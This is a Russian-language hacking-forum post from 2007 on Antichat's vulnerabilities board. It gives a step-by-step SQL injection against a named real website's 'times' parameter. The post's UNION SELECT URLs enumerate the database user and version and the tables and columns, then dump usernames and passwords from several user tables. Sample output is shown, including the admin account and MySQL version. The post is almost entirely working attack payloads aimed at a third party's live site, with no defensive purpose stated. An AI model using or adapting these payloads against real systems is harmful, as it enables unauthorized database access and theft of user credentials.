ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 13.10.2007, 10:11
Nea7
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
Провел на форуме:
5076186

Репутация: 778
По умолчанию

Код:
http://tip.it/runescape/?times='+UNION+SELECT+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5/*
admin@localhost:5.0.27-log:runescape
выводим количество таблиц
Код:
http://tip.it/runescape/?times='+UNION+SELECT+1,2,3,count(table_name),5+from+information_schema.tables/*
142, =///
выводим таблицы, где есть колонка password
Код:
http://tip.it/runescape/?times='+UNION+SELECT+1,2,3,concat(table_schema,0x3a,table_name),5+from+information_schema.columns+where+column_name=char(112,97,115,115,119,111,1 14,100)+limit+0,1/*
lotro:adds_users
runescape:adds_users
war:adds_users
выводим, например, колонки из lotro:adds_users
Код:
http://tip.it/runescape/?times='+UNION+SELECT+1,2,3,concat(column_name),5+from+information_schema.columns+where+table_schema=char(108,111,116,114,111)+and+table_name=char(97,100 ,100,115,95,117,115,101,114,115)+limit+0,1/*
user_id
user_name
password
итд
Цитата:
http://tip.it/runescape /?times='+UNION+SELECT+1,2,3,concat(user_name,0x3a, password),5+from+lotro.adds_users/*
http://tip.it/runescape /?times='+UNION+SELECT+1,2,3,concat(user_name,0x3a, password),5+from+war.adds_users/*
http://tip.it/runescape /?times='+UNION+SELECT+1,2,3,concat(user_name,0x3a, password),5+from+runescape.adds_users/*
итд лимитом
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ